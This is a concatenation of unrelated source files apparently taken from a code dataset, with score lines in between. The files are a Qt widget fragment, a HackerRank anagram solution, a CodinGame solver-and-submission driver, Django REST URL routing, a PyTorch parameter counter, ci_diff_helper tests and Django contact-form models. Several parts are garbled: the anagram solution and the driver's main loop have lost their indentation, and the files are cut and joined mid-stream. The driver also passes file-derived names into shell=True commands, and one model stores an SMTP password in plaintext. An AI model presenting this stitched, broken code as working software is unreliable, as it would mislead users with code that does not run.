        for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
            if i % 14 == 0:
                # NOTE(review): j += i jumps the grid row index by 14 on wrap
                # (rows 0 and 14); QGridLayout collapses the empty rows, but
                # j += 1 was likely intended -- confirm.
                j += i
                i = 0
            letter_button = buttons.StyleBaseButton(letter, button_style=buttons.ButtonStyles.FlatStyle, parent=self)
            letter_button.setCheckable(True)
            letters_layout.addWidget(letter_button, j, i)
            if i == 0 and j == 0:
                letter_button.setChecked(True)
            i += 1
        widget_layout.addLayout(letters_layout)
        # Capital toggle, centered on its own row after the letters.
        capital_widget = QWidget(parent=self)
        capital_layout = layouts.HorizontalLayout()
        capital_widget.setLayout(capital_layout)
        capital_label = label.BaseLabel('Capital:', parent=self)
        self._capital_switch = switch.SwitchWidget(parent=self)
        self._capital_switch.setChecked(True)
        capital_layout.addStretch()
        capital_layout.addWidget(capital_label)
        capital_layout.addWidget(self._capital_switch)
        capital_layout.addStretch()
        letters_layout.addWidget(capital_widget, j, i+1, 1, 2)
        return widget
class LetterRenamerPluginModel(QObject):
    """Data model for the letter renamer plugin (currently stateless)."""
    def __init__(self):
        super(LetterRenamerPluginModel, self).__init__()
class LetterRenamerPluginController(object):
    """Thin controller that owns and exposes the plugin's model."""
    def __init__(self, model):
        super(LetterRenamerPluginController, self).__init__()
        self._model = model
    @property
    def model(self):
        """The model instance this controller operates on (read-only)."""
        return self._model
| 2.234375 | 2 |
HackerRank/Problem Solving/Algorithms/Strings/Making Anagrams.py | anubhab-code/Competitive-Programming | 0 | 12766835 | str1 = input()
str2 = input()
a = [0 for i in range(0,27)]
for i in str1:
a[ord(i)-ord('a')] += 1
for i in str2:
a[ord(i)-ord('a')] -= 1
ans = 0
for i in a:
if ( i < 0 ):
ans += -i
else:
ans += i
print(ans) | 3.25 | 3 |
src/solorunner/submit.py | marchete/RN_Explorer | 1 | 12766836 | <reponame>marchete/RN_Explorer
#!/usr/bin/env python3
"""Number Shifting driver: runs the native solver on the current level,
submits the solution to CodinGame, and downloads the next level."""
import sys
import time
import string
import random
import glob
import re
import traceback
import zlib
import base64
import os
import io
import requests
import subprocess


def _int_arg(index, default):
    """Return sys.argv[index] as an int, or *default* when the argument
    is missing or not a valid integer.

    Replaces ten copy-pasted bare try/except blocks; only the exceptions
    int(sys.argv[i]) can actually raise are caught.
    """
    try:
        return int(sys.argv[index])
    except (IndexError, ValueError):
        return default


# Solver binary name is the only mandatory argument.
program_name = sys.argv[1]
# Optional tuning parameters (same positions and defaults as before).
threads = _int_arg(2, 2)
reset_seconds = _int_arg(3, 39)
lFa = _int_arg(4, 3200)
K_A = _int_arg(5, 50000)
K_B = _int_arg(6, 0)
K_C = _int_arg(7, 2000)
K_D = _int_arg(8, 40000)
INC_TIME = _int_arg(9, 100)
INC_LFA = _int_arg(10, 40)
RECOMB = _int_arg(11, 0)

program_execute = './'+program_name+' '+str(threads)+' '+str(reset_seconds)+' '+str(lFa)+' '+str(K_A)+' '+str(K_B)+' '+str(K_C)+' '+str(K_D)+' '+str(INC_TIME)+' '+str(INC_LFA)+' '+str(RECOMB)

salida = "solution.txt"
# Credentials live in local text files next to this script.
#put your email on a text file named cg_email.txt
with open('cg_email.txt', 'r') as f:
    email = f.read().strip()
#put your password on a text file named cg_pass.txt
with open('cg_pass.txt', 'r') as f:
    password = f.read().strip()
with open('downloader.py', 'r') as f:
    codeDL = f.read().strip()

# Mutable run state shared with the functions below.
number_level = 0
userId = ''
handle = ''
session = requests.Session()
parameters = ''
runningprocess = ''
def killProcess():
    """Best-effort kill of the solver binary and any leftover RN_Explo* runs."""
    global runningprocess
    global program_name
    targets = ["RN_Explo*"]
    if runningprocess != "":
        targets.append(runningprocess)
    if program_name != "":
        targets.append(program_name)
    for target in targets:
        subprocess.run("killall " + target + " >/dev/null 2>&1", shell=True)
def recompileCode():
    """Patch the MAX_W/MAX_H/MAX_NUMBERS constants in the solver's .cpp
    source to fit the current level.txt, then recompile (via CLANG17.sh)
    when the source changed or the binary is missing."""
    global runningprocess
    global program_name
    if (runningprocess!=""):
        cpp_filename=runningprocess
    else:
        cpp_filename=program_name
    with open(cpp_filename+'.cpp', 'r') as f:
        original_content = f.read().strip()
    # BUGFIX: default to the unmodified source so new_content is always
    # defined; previously a missing/malformed level.txt or a caught
    # exception left it unbound and the len() check below raised NameError.
    new_content = original_content
    try:
        if os.path.exists('level.txt'):
            with open('level.txt', 'r') as f:
                level = f.read().strip()
            # Count the nonzero cells of the level (everything after the
            # width/height header) into cuentaNUM.txt.
            subprocess.run('cat level.txt | tr " " "\\n" |tail -n+2| grep -v ^0$ | wc -l > cuentaNUM.txt', shell=True)
            ele=level.splitlines()
            #******************************* CODE RELOAD *************************************
            if (len(ele)>=4):
                DIM=ele[0].split()
                if (len(DIM)>=2):
                    W=int(DIM[0])
                    H=int(DIM[1])
                    with open('cuentaNUM.txt', 'r') as f:
                        MAX_NUMBERS = f.read().strip()
                    if (MAX_NUMBERS!="" and MAX_NUMBERS!="0"):
                        MAX_NUMBERS=int(MAX_NUMBERS)
                        print(' -->Recompiling '+cpp_filename+'.cpp with W='+str(W)+' H='+str(H)+' MAX_NUMBERS='+str(MAX_NUMBERS)+" ");
                        # The solver needs at least 256 number slots.
                        if (MAX_NUMBERS<256):
                            MAX_NUMBERS=256
                        new_content=re.sub(r"const\s+int\s+MAX_W\s*=.*;", "const int MAX_W = "+str(W)+";", original_content)
                        new_content=re.sub(r"const\s+int\s+MAX_H\s*=.*;", "const int MAX_H = "+str(H)+";", new_content)
                        new_content=re.sub(r"const\s+int\s+MAX_NUMBERS\s*=.*;", "const int MAX_NUMBERS = "+str(MAX_NUMBERS)+";", new_content)
                    else:
                        print("Wrong numbers:"+MAX_NUMBERS)
            subprocess.run("rm cuentaNUM.txt >/dev/null 2>&1", shell=True)
        else:
            print('Recompiling '+cpp_filename+'.cpp without changes.... ');
    except Exception as error:
        print('Error compiling: %s' % error)
    # Sanity check: only write back a plausibly complete source file.
    if (len(new_content)>50000):
        with open(cpp_filename+'.cpp', 'w') as f:
            f.write(new_content)
    if (new_content!=original_content or not os.path.exists(cpp_filename)):
        subprocess.run("./CLANG17.sh "+cpp_filename, shell=True)
    else:
        print('No need to recompile '+cpp_filename+'')
# for each level of the game
if os.path.exists('runningprocess.txt'):
with open('runningprocess.txt', 'r') as f:
runningprocess = f.read().strip()
while True:
try:
recompileCode()
if os.path.exists('parameters.txt'):
with open('parameters.txt', 'r') as f:
parameters = f.read().strip()
if os.path.exists('runningprocess.txt'):
with open('runningprocess.txt', 'r') as f:
runningprocess = f.read().strip()
if ((runningprocess!='') and (parameters!='')):
program_execute='./'+runningprocess+' '+str(threads)+' '+parameters
if ((runningprocess=='') and (parameters!='')):
program_execute='./'+program_name+' '+str(threads)+' '+parameters
if ((runningprocess!='') and (parameters=='')):
program_execute = './'+runningprocess+' '+str(threads)+' '+str(reset_seconds)+' '+str(lFa)+' '+str(K_A)+' '+str(K_B)+' '+str(K_C)+' '+str(K_D)+' '+str(INC_TIME)+' '+str(INC_LFA)+' '+str(RECOMB)
print("Program execute:"+program_execute)
# run the solver on level.txt and save output to solution.txt
subprocess.run(program_execute + " > "+salida, shell=True)
#with open('solution.txt', "w") as outfile:
# subprocess.run(program_execute, stdout=outfile)
with open('level_password.txt', 'r') as f:
level_pass = f.read().strip()
try:
with open(salida, 'r') as f:
solution = f.read().strip()
except:
pass
if solution == '':
listaSoluciones = glob.glob('SOLUTION_*_'+level_pass+'.txt')
for archivo_sol in listaSoluciones:
print('Found solution file '+archivo_sol)
with open(archivo_sol, 'r') as f:
solution=''
lines=f.readlines()
saltaLinea=True
for line in (lines):
if (not saltaLinea):
solution=solution+line
if (level_pass in line):
saltaLinea=False
break
if solution == '':
print('Empty solution, crashed? Retrying...')
time.sleep(5)
continue
solution = level_pass + '\n' + solution
with open('log.txt', 'a') as f:
f.write('\nsolution:\n')
f.write(solution)
# submit the solution to CodinGame
# login to CodinGame and get submit ID
session = requests.Session()
r = session.post('https://www.codingame.com/services/Codingamer/loginSiteV2', json=[email, password, True])
userId = r.json()['codinGamer']['userId']
r = session.post('https://www.codingame.com/services/Puzzle/generateSessionFromPuzzlePrettyId', json=[userId, "number-shifting", False])
handle = r.json()['handle']
r = session.post('https://www.codingame.com/services/TestSession/play', json=[handle, {'code':solution, 'programmingLanguageId':'PHP', 'multipleLanguages':{'testIndex':1}}])
print('replay: https://www.codingame.com/replay/' + str(r.json()['gameId']))
next_level = ''
if 'gameInformation' in r.json()['frames'][-2]:
next_level = r.json()['frames'][-2]['gameInformation']
if os.path.exists('number_level.txt'):
with open('number_level.txt', 'r') as f:
clls=f.read().strip()
current_number_level=int(clls) if clls.isdigit() else 0
if current_number_level==931:
print('Level 931 solved. WARNING! Level 932+ needs a different level.txt downloader, writting on stderr a compressed text in zip->base64')
break
if not 'Code for next level' in next_level:
next_level=''
try:
next_level=re.findall(r'Code for next level .level [0-9]+.: ([a-z]+)', r.text)[0]
level_password=next_level
except:
pass
if next_level == '':
print('The solution was wrong, watch the replay for details')
time.sleep(30)
continue
else:
next_level = next_level[next_level.find(':')+2:]
level_password = next_level.split('\n')[0]
number_level = int(1 + r.json()['metadata']['Level'])
if (number_level < current_number_level):
print('Error: lower than current levelr?')
number_level=current_number_level+1
with open('level_password.txt', 'w') as f:
f.write(level_password)
with open('number_level.txt', 'w') as f:
f.write(str(number_level))
# get the full level
level_input='\n'.join(next_level.split('\n')[1:])
if (number_level > 258): #fix for CG stderr limitations. TODO: On level 932+ you need a different approach. I went to zip->base64 print to stderr.
r = session.post('https://www.codingame.com/services/TestSession/play', json=[handle, {'code':'#Level:'+str(number_level)+'\r\necho "'+level_password+'";cat >&2', 'programmingLanguageId':'Bash', 'multipleLanguages':{'testIndex':1}}])
level_input = r.json()['frames'][2]['stderr']
if (level_input!='bajaNivel'):
with open('level.txt', 'w') as f:
f.write(level_input + '\n')
# save input for next level
with open('log.txt', 'a') as f:
f.write('\nreplay: https://www.codingame.com/replay/' + str(r.json()['gameId']))
f.write('\n\nLevel ' + str(number_level) + ':\n')
f.write(level_password)
f.write(level_input)
subprocess.run("rm SAFE_*.txt >/dev/null 2>&1", shell=True)
subprocess.run("rm APROX_*.txt >/dev/null 2>&1", shell=True)
subprocess.run("rm EXTERN_*.txt >/dev/null 2>&1", shell=True)
subprocess.run("rm solution.txt >/dev/null 2>&1", shell=True)
killProcess()
except Exception as e:
with open('log.txt', 'a') as f:
f.write("Exception {0}\n".format(str(e))+" "+traceback.format_exc())
session = requests.Session()
time.sleep(10)
| 2.375 | 2 |
information/urls.py | encrypted-fox/students_performance_monitoring | 0 | 12766837 | <reponame>encrypted-fox/students_performance_monitoring
from rest_framework import routers
from .views import *
from . import views

router = routers.DefaultRouter()

# Plain model viewsets (the router derives their basenames from the queryset).
router.register('start_years', StartYearsViewSet)
router.register('terms', TermsViewSet)
router.register('marks', MarksViewSet)
router.register('control_types', ControlTypesViewSet)

# Report-style list endpoints: (url prefix, viewset, basename).
# Registered from one table instead of ~26 copy-pasted register() calls.
_STUDENT_LIST_ROUTES = (
    ('list_students_with_more_5', ListStudentsWithMore5, 'students_with_more_5'),
    ('list_students_with_more_4', ListStudentsWithMore4, 'students_with_more_4'),
    ('list_students_with_more_3', ListStudentsWithMore3, 'students_with_more_3'),
    ('list_students_with_more_2', ListStudentsWithMore2, 'students_with_more_2'),
    ('list_students_with_more_pass', ListStudentsWithMorePass, 'students_with_more_pass'),
    ('list_students_with_more_not_pass', ListStudentsWithMoreNotPass, 'students_with_more_not_pass'),
    ('list_students_with_more_not_appointed', ListStudentsWithMoreNotAppointed, 'students_with_more_not_appointed'),
    ('list_students_only_with_more_then_2', ListStudentsOnlyWithMoreThen2, 'students_only_with_more_then_2'),
    ('list_students_only_with_more_then_3', ListStudentsOnlyWithMoreThen3, 'students_only_with_more_then_3'),
    ('list_students_with_less_3', ListStudentsWithLess3, 'students_with_less_3'),
    ('list_students_with_less_2', ListStudentsWithLess2, 'students_with_less_2'),
    ('list_students_with_one_5', ListStudentsWithOne5, 'students_with_one_5'),
    ('list_students_with_one_4', ListStudentsWithOne4, 'students_with_one_4'),
    ('list_students_with_one_3', ListStudentsWithOne3, 'students_with_one_3'),
    ('list_students_with_one_2', ListStudentsWithOne2, 'students_with_one_2'),
    ('list_students_with_one_pass', ListStudentsWithOnePass, 'students_with_one_pass'),
    ('list_students_with_one_not_pass', ListStudentsWithOneNotPass, 'students_with_one_not_pass'),
    ('list_students_with_one_not_appointed', ListStudentsWithOneNotAppointed, 'students_with_one_not_appointed'),
    ('list_students_only_with_5', ListStudentsOnlyWith5, 'students_only_with_5'),
    ('list_students_only_with_4', ListStudentsOnlyWith4, 'students_only_with_4'),
    ('list_students_only_with_3', ListStudentsOnlyWith3, 'students_only_with_3'),
    ('list_students_only_with_2', ListStudentsOnlyWith2, 'students_only_with_2'),
    ('list_students_only_with_pass', ListStudentsOnlyWithPass, 'students_only_with_pass'),
    ('list_students_only_with_not_pass', ListStudentsOnlyWithNotPass, 'students_only_with_not_pass'),
    ('list_students_only_with_not_appointed', ListStudentsOnlyWithNotAppointed, 'students_only_with_not_appointed'),
    ('list_students_with', ListStudentsWith, 'students_with'),
)
for _prefix, _viewset, _basename in _STUDENT_LIST_ROUTES:
    router.register(_prefix, _viewset, basename=_basename)

urlpatterns = router.urls
| 2.03125 | 2 |
check_model_params.py | mlvc-lab/ILKP | 1 | 12766838 | import argparse
import numpy as np
import models
from utils import set_arch_name
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
def config():
    r"""Build and parse the command-line configuration.

    Returns the argparse namespace carrying the architecture choice,
    layer count, batch-norm flag, width multiplier and the pointwise
    binding (subvector) size.
    """
    arg_parser = argparse.ArgumentParser(description='Check model parameters')
    arg_parser.add_argument('-a', '--arch', metavar='ARCH', default='mobilenet',
                            choices=model_names,
                            help='model architecture: ' +
                                 ' | '.join(model_names) +
                                 ' (default: mobilenet)')
    arg_parser.add_argument('--layers', default=16, type=int, metavar='N',
                            help='number of layers in VGG/ResNet/ResNeXt/WideResNet (default: 16)')
    arg_parser.add_argument('--bn', '--batch-norm', dest='bn', action='store_true',
                            help='Use batch norm in VGG?')
    arg_parser.add_argument('--width-mult', default=1.0, type=float, metavar='WM',
                            help='width multiplier to thin a network '
                                 'uniformly at each layer (default: 1.0)')
    # for calculating number of pwkernel slice
    arg_parser.add_argument('-pwd', '--pw-bind-size', default=8, type=int, metavar='N',
                            dest='pw_bind_size',
                            help='the number of binding channels in pointwise convolution '
                                 '(subvector size) (default: 8)')
    return arg_parser.parse_args()
def main():
    """Report parameter counts of the selected architecture.

    Builds the model once per dataset (CIFAR-10 and CIFAR-100 -- the
    class count changes the classifier size) and prints total and
    trainable parameter counts for each.
    """
    opt = config()
    # Canonical architecture name (includes depth/width suffixes).
    arch_name = set_arch_name(opt)

    for data in ('cifar10', 'cifar100'):
        _report_params(opt, arch_name, data)


def _report_params(opt, arch_name, data):
    """Instantiate ``opt.arch`` for dataset *data* and print its parameter counts."""
    print('\n[ {}-{} parameters ]'.format(arch_name, data))
    model = models.__dict__[opt.arch](data=data, num_layers=opt.layers,
                                      width_mult=opt.width_mult, batch_norm=opt.bn)
    num_params = sum(p.numel() for p in model.parameters())
    num_trainable_params = sum(p.numel() for p in model.parameters()
                               if p.requires_grad)
    print('Number of all parameters: ', num_params)
    # Consistency fix: the original printed "all trainable" for cifar10 but
    # "trainable" for cifar100; one label is used for both datasets now.
    print('Number of trainable parameters: ', num_trainable_params)
if __name__ == '__main__':
    # CLI entry point: only run when executed directly, not on import.
    main()
| 2.328125 | 2 |
tests/test_circle_ci.py | dhermes/ci-diff-helper | 5 | 12766839 | <filename>tests/test_circle_ci.py<gh_stars>1-10
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class Test__circle_ci_pr(unittest.TestCase):
@staticmethod
def _call_function_under_test():
from ci_diff_helper import circle_ci
return circle_ci._circle_ci_pr()
def test_success(self):
import mock
from ci_diff_helper import environment_vars as env
valid_int = '331'
actual_val = 331
self.assertEqual(int(valid_int), actual_val)
mock_env = {env.CIRCLE_CI_PR_NUM: valid_int}
with mock.patch('os.environ', new=mock_env):
self.assertEqual(self._call_function_under_test(), actual_val)
def test_failure_unset(self):
import mock
with mock.patch('os.environ', new={}):
self.assertIsNone(self._call_function_under_test())
def test_failure_bad_value(self):
import mock
from ci_diff_helper import environment_vars as env
not_int = 'not-int'
self.assertRaises(ValueError, int, not_int)
mock_env = {env.CIRCLE_CI_PR_NUM: not_int}
with mock.patch('os.environ', new=mock_env):
self.assertIsNone(self._call_function_under_test())
class Test__repo_url(unittest.TestCase):
@staticmethod
def _call_function_under_test():
from ci_diff_helper import circle_ci
return circle_ci._repo_url()
def test_success(self):
import mock
from ci_diff_helper import environment_vars as env
repo_url = 'https://github.com/foo/bar'
mock_env = {env.CIRCLE_CI_REPO_URL: repo_url}
with mock.patch('os.environ', new=mock_env):
result = self._call_function_under_test()
self.assertEqual(result, repo_url)
def test_failure(self):
import mock
with mock.patch('os.environ', new={}):
with self.assertRaises(OSError):
self._call_function_under_test()
class Test__provider_slug(unittest.TestCase):
@staticmethod
def _call_function_under_test(repo_url):
from ci_diff_helper import circle_ci
return circle_ci._provider_slug(repo_url)
def test_github(self):
from ci_diff_helper import circle_ci
repo_url = 'https://github.com/hi/goodbye'
provider, slug = self._call_function_under_test(repo_url)
self.assertIs(provider, circle_ci.CircleCIRepoProvider.github)
self.assertEqual(slug, 'hi/goodbye')
def test_github_bad_prefix(self):
with self.assertRaises(ValueError):
self._call_function_under_test('http://github.com/org/repo')
def test_bitbucket(self):
from ci_diff_helper import circle_ci
repo_url = 'https://bitbucket.org/fly/on-the-wall'
provider, slug = self._call_function_under_test(repo_url)
self.assertIs(provider, circle_ci.CircleCIRepoProvider.bitbucket)
self.assertEqual(slug, 'fly/on-the-wall')
def test_bitbucket_bad_prefix(self):
with self.assertRaises(ValueError):
self._call_function_under_test('http://bitbucket.org/user/proj')
def test_bad_url(self):
with self.assertRaises(ValueError):
self._call_function_under_test('nope')
class TestCircleCIRepoProvider(unittest.TestCase):
@staticmethod
def _get_target_class():
from ci_diff_helper import circle_ci
return circle_ci.CircleCIRepoProvider
def _make_one(self, enum_val):
klass = self._get_target_class()
return klass(enum_val)
def test_members(self):
klass = self._get_target_class()
self.assertEqual(
set([enum_val.name for enum_val in klass]),
set(['bitbucket', 'github']))
def test_bitbucket(self):
klass = self._get_target_class()
provider_obj = self._make_one('bitbucket')
self.assertIs(provider_obj, klass.bitbucket)
def test_github(self):
klass = self._get_target_class()
provider_obj = self._make_one('github')
self.assertIs(provider_obj, klass.github)
def test_invalid(self):
with self.assertRaises(ValueError):
self._make_one('mustard')
class TestCircleCI(unittest.TestCase):
    """Unit tests for the ``CircleCI`` config object.

    Each cached property is exercised three ways: computing the value via
    a patched helper, re-reading it from the cache, and the failure path.
    """

    @staticmethod
    def _get_target_class():
        """Return the class under test (imported lazily)."""
        from ci_diff_helper import circle_ci
        return circle_ci.CircleCI

    def _make_one(self):
        """Construct a fresh instance of the class under test."""
        klass = self._get_target_class()
        return klass()

    def test_constructor(self):
        from ci_diff_helper import _utils

        klass = self._get_target_class()
        config = self._make_one()
        self.assertIsInstance(config, klass)
        # All lazily-computed attributes start out unset.
        self.assertIs(config._active, _utils.UNSET)
        self.assertIs(config._base, _utils.UNSET)
        self.assertIs(config._branch, _utils.UNSET)
        self.assertIs(config._is_merge, _utils.UNSET)
        self.assertIs(config._pr, _utils.UNSET)
        self.assertIs(config._pr_info_cached, _utils.UNSET)
        self.assertIs(config._provider, _utils.UNSET)
        self.assertIs(config._repo_url, _utils.UNSET)
        self.assertIs(config._slug, _utils.UNSET)
        self.assertIs(config._tag, _utils.UNSET)

    def test___repr__(self):
        import mock

        config = self._make_one()
        # With an empty environment the config reports itself inactive.
        with mock.patch('os.environ', new={}):
            self.assertEqual(repr(config), '<CircleCI (active=False)>')

    def _pr_helper(self, pr_val):
        """Drive the ``pr`` property with a patched ``_circle_ci_pr`` helper."""
        import mock
        from ci_diff_helper import _utils

        config = self._make_one()
        # Make sure there is no _pr value set.
        self.assertIs(config._pr, _utils.UNSET)

        # Patch the helper so we can control the value.
        travis_pr_patch = mock.patch(
            'ci_diff_helper.circle_ci._circle_ci_pr', return_value=pr_val)
        with travis_pr_patch as mocked:
            result = config.pr
            self.assertIs(result, pr_val)
            mocked.assert_called_once_with()

        return config

    def test_pr_property(self):
        pr_val = 1337
        self._pr_helper(pr_val)

    def test_pr_property_cache(self):
        pr_val = 42043
        config = self._pr_helper(pr_val)
        # Test that the value is cached.
        self.assertIs(config._pr, pr_val)
        # Test that cached value is re-used.
        self.assertIs(config.pr, pr_val)

    def test_in_pr_property(self):
        config = self._make_one()
        # Patch with an actual PR.
        config._pr = 1337
        self.assertTrue(config.in_pr)

    def test_in_pr_property_fails(self):
        config = self._make_one()
        # Patch a missing PR.
        config._pr = None
        self.assertFalse(config.in_pr)

    def _repo_url_helper(self, repo_url_val):
        """Drive the ``repo_url`` property with a patched ``_repo_url`` helper."""
        import mock
        from ci_diff_helper import _utils

        config = self._make_one()
        # Make sure there is no _repo_url value set.
        self.assertIs(config._repo_url, _utils.UNSET)

        # Patch the helper so we can control the value.
        repo_url_patch = mock.patch(
            'ci_diff_helper.circle_ci._repo_url',
            return_value=repo_url_val)
        with repo_url_patch as mocked:
            result = config.repo_url
            self.assertIs(result, repo_url_val)
            mocked.assert_called_once_with()

        return config

    def test_repo_url_property(self):
        repo_url_val = 'reap-oh-no-you-are-elle'
        self._repo_url_helper(repo_url_val)

    def test_repo_url_property_cache(self):
        repo_url_val = 'read-poem-earl'
        config = self._repo_url_helper(repo_url_val)
        # Test that the value is cached.
        self.assertIs(config._repo_url, repo_url_val)
        # Test that cached value is re-used.
        self.assertIs(config.repo_url, repo_url_val)

    def _slug_provider_helper(self, provider_val, slug_val, slug_first=False):
        """Drive ``provider``/``slug`` (both come from one ``_provider_slug`` call).

        ``slug_first`` controls which property is read first, to prove the
        single helper call populates both regardless of access order.
        """
        import mock
        from ci_diff_helper import _utils

        config = self._make_one()
        config._repo_url = mock.sentinel.repo_url
        # Make sure there is no _provider value set.
        self.assertIs(config._provider, _utils.UNSET)

        # Patch the helper so we can control the value.
        provider_patch = mock.patch(
            'ci_diff_helper.circle_ci._provider_slug',
            return_value=(provider_val, slug_val))
        with provider_patch as mocked:
            if slug_first:
                self.assertIs(config.slug, slug_val)
                self.assertIs(config.provider, provider_val)
            else:
                self.assertIs(config.provider, provider_val)
                self.assertIs(config.slug, slug_val)
            mocked.assert_called_once_with(mock.sentinel.repo_url)

        return config

    def test_provider_property(self):
        provider_val = 'pro-divide-uhr'
        self._slug_provider_helper(provider_val, None)

    def test_provider_property_cache(self):
        provider_val = 'pro-bono-vide'
        config = self._slug_provider_helper(provider_val, None)
        # Test that the value is cached.
        self.assertIs(config._provider, provider_val)
        # Test that cached value is re-used.
        self.assertIs(config.provider, provider_val)

    def test_slug_property(self):
        slug_val = 'slug-slugger-sluggest'
        self._slug_provider_helper(None, slug_val, slug_first=True)

    def test_slug_property_cache(self):
        slug_val = 'soup'
        config = self._slug_provider_helper(
            None, slug_val, slug_first=True)
        # Test that the value is cached.
        self.assertIs(config._slug, slug_val)
        # Test that cached value is re-used.
        self.assertIs(config.slug, slug_val)

    def test__pr_info_property_cache(self):
        import mock

        config = self._make_one()
        config._pr_info_cached = mock.sentinel.info
        self.assertIs(config._pr_info, mock.sentinel.info)

    def test__pr_info_property_non_pr(self):
        from ci_diff_helper import _utils

        config = self._make_one()
        # Fake that there is no PR.
        config._pr = None
        self.assertIsNone(config.pr)
        # Make sure the cached value isn't set.
        self.assertIs(config._pr_info_cached, _utils.UNSET)
        # Now compute the property value.
        self.assertEqual(config._pr_info, {})

    def test__pr_info_property_github_pr(self):
        import mock
        from ci_diff_helper import circle_ci
        from ci_diff_helper import environment_vars as env

        config = self._make_one()
        slug = 'arf/garf'
        repo_url = circle_ci._GITHUB_PREFIX + slug
        pr_id = 223311
        mock_env = {
            env.CIRCLE_CI_REPO_URL: repo_url,
            env.CIRCLE_CI_PR_NUM: str(pr_id),
        }
        with mock.patch('os.environ', new=mock_env):
            with mock.patch('ci_diff_helper._github.pr_info',
                            return_value=mock.sentinel.info) as get_info:
                pr_info = config._pr_info
                self.assertIs(pr_info, mock.sentinel.info)
                get_info.assert_called_once_with(slug, pr_id)
                self.assertEqual(get_info.call_count, 1)
                # Make sure value is cached and doesn't call the helper again.
                self.assertIs(pr_info, mock.sentinel.info)
                self.assertEqual(get_info.call_count, 1)

    def test__pr_info_property_pr_not_github(self):
        import mock
        from ci_diff_helper import circle_ci
        from ci_diff_helper import environment_vars as env

        config = self._make_one()
        slug = 'bucket/chuck-it'
        repo_url = circle_ci._BITBUCKET_PREFIX + slug
        mock_env = {
            env.CIRCLE_CI_REPO_URL: repo_url,
            env.CIRCLE_CI_PR_NUM: '817',
        }
        # PR info is only implemented for GitHub-hosted repositories.
        with mock.patch('os.environ', new=mock_env):
            with mock.patch('ci_diff_helper._github.pr_info') as get_info:
                with self.assertRaises(NotImplementedError):
                    getattr(config, '_pr_info')
                get_info.assert_not_called()

    def test_base_property_cache(self):
        import mock

        config = self._make_one()
        config._base = mock.sentinel.base
        self.assertIs(config.base, mock.sentinel.base)

    def test_base_property_non_pr(self):
        config = self._make_one()
        # Fake that we are outside a PR.
        config._pr = None
        with self.assertRaises(NotImplementedError):
            getattr(config, 'base')

    def test_base_property_success(self):
        config = self._make_one()
        # Fake that we are inside a PR.
        config._pr = 123
        base_sha = '23ff39e7f437d888cb1aa07b4646fc6376f4af35'
        payload = {'base': {'sha': base_sha}}
        config._pr_info_cached = payload
        self.assertEqual(config.base, base_sha)

    def test_base_property_pr_bad_payload(self):
        config = self._make_one()
        # Fake that we are inside a PR.
        config._pr = 678
        config._pr_info_cached = {}
        # Also fake the info that shows up in the exception.
        config._slug = 'foo/food'
        with self.assertRaises(KeyError):
            getattr(config, 'base')
| 2.484375 | 2 |
cmsplugin_contact_form/models.py | cesarrdz999/djangocms-contact-form | 2 | 12766840 | <reponame>cesarrdz999/djangocms-contact-form<filename>cmsplugin_contact_form/models.py<gh_stars>1-10
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from cms.models import CMSPlugin
@python_2_unicode_compatible
class ContactFormCMS(CMSPlugin):
    """Plugin configuration for a contact form: SMTP settings and CSS hooks."""

    smtp_server = models.CharField(
        blank=False,
        max_length=255
    )
    smtp_port = models.CharField(
        blank=False,
        max_length=10
    )
    email = models.CharField(
        blank=False,
        max_length=255
    )
    # NOTE(review): the SMTP password is stored as plaintext in the CMS
    # database -- confirm this is acceptable for the deployment.
    password = models.CharField(
        blank=False,
        max_length=255
    )
    # NOTE(review): BooleanField without an explicit default -- recent
    # Django versions require one; confirm the targeted Django version.
    use_tls = models.BooleanField()
    # Extra CSS classes applied to the rendered <form> element.
    html_classes = models.CharField(
        blank=True,
        max_length=255
    )

    def __str__(self):
        return self.email
@python_2_unicode_compatible
class ContactFormBaseFieldCMS(CMSPlugin):
    """Common attributes shared by every contact-form field plugin."""

    # Human-readable label rendered next to the input.
    label = models.CharField(
        blank=False,
        max_length=255
    )
    # HTML ``id`` attribute of the rendered input element.
    html_id = models.CharField(
        blank=False,
        max_length=50
    )
    # HTML ``name`` attribute (the POST key for the field value).
    html_name = models.CharField(
        blank=False,
        max_length=50
    )
    # Extra CSS classes applied to the rendered input element.
    html_classes = models.CharField(
        blank=True,
        max_length=255
    )

    def __str__(self):
        return self.label
# NOTE(review): on Python 2, @python_2_unicode_compatible raises ValueError
# for classes that do not define __str__ themselves; the field subclasses
# below inherit __str__ from the base class -- confirm the project targets
# Python 3 only (where the decorator is a no-op).
@python_2_unicode_compatible
class ContactFormTextFieldCMS(ContactFormBaseFieldCMS):
    """Single-line text input field for the contact form."""

    html_placeholder = models.CharField(
        blank=True,
        max_length=255
    )
    default_value = models.CharField(
        blank=True,
        max_length=255
    )
    required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormEmailFieldCMS(ContactFormBaseFieldCMS):
    """Email input field for the contact form."""

    html_placeholder = models.CharField(
        blank=True,
        max_length=255
    )
    default_value = models.CharField(
        blank=True,
        max_length=255
    )
    required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormPhoneFieldCMS(ContactFormBaseFieldCMS):
    """Phone-number input field with optional client-side validation hints."""

    html_placeholder = models.CharField(
        blank=True,
        max_length=255
    )
    # Regex/pattern forwarded to the HTML ``pattern`` attribute (presumably;
    # verify against the plugin template).
    phone_pattern = models.CharField(
        blank=True,
        max_length=255
    )
    # Stored as text; rendered as the input's maxlength (up to 4 digits).
    phone_max_length = models.CharField(
        blank=True,
        max_length=4
    )
    default_value = models.CharField(
        blank=True,
        max_length=255
    )
    required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormTextAreaFieldCMS(ContactFormBaseFieldCMS):
    """Multi-line <textarea> field for the contact form."""

    html_placeholder = models.CharField(
        blank=True,
        max_length=255
    )
    # ``rows``/``cols`` attributes of the textarea, stored as text.
    html_rows = models.CharField(
        blank=True,
        max_length=4
    )
    html_cols = models.CharField(
        blank=True,
        max_length=4
    )
    default_value = models.CharField(
        blank=True,
        max_length=255
    )
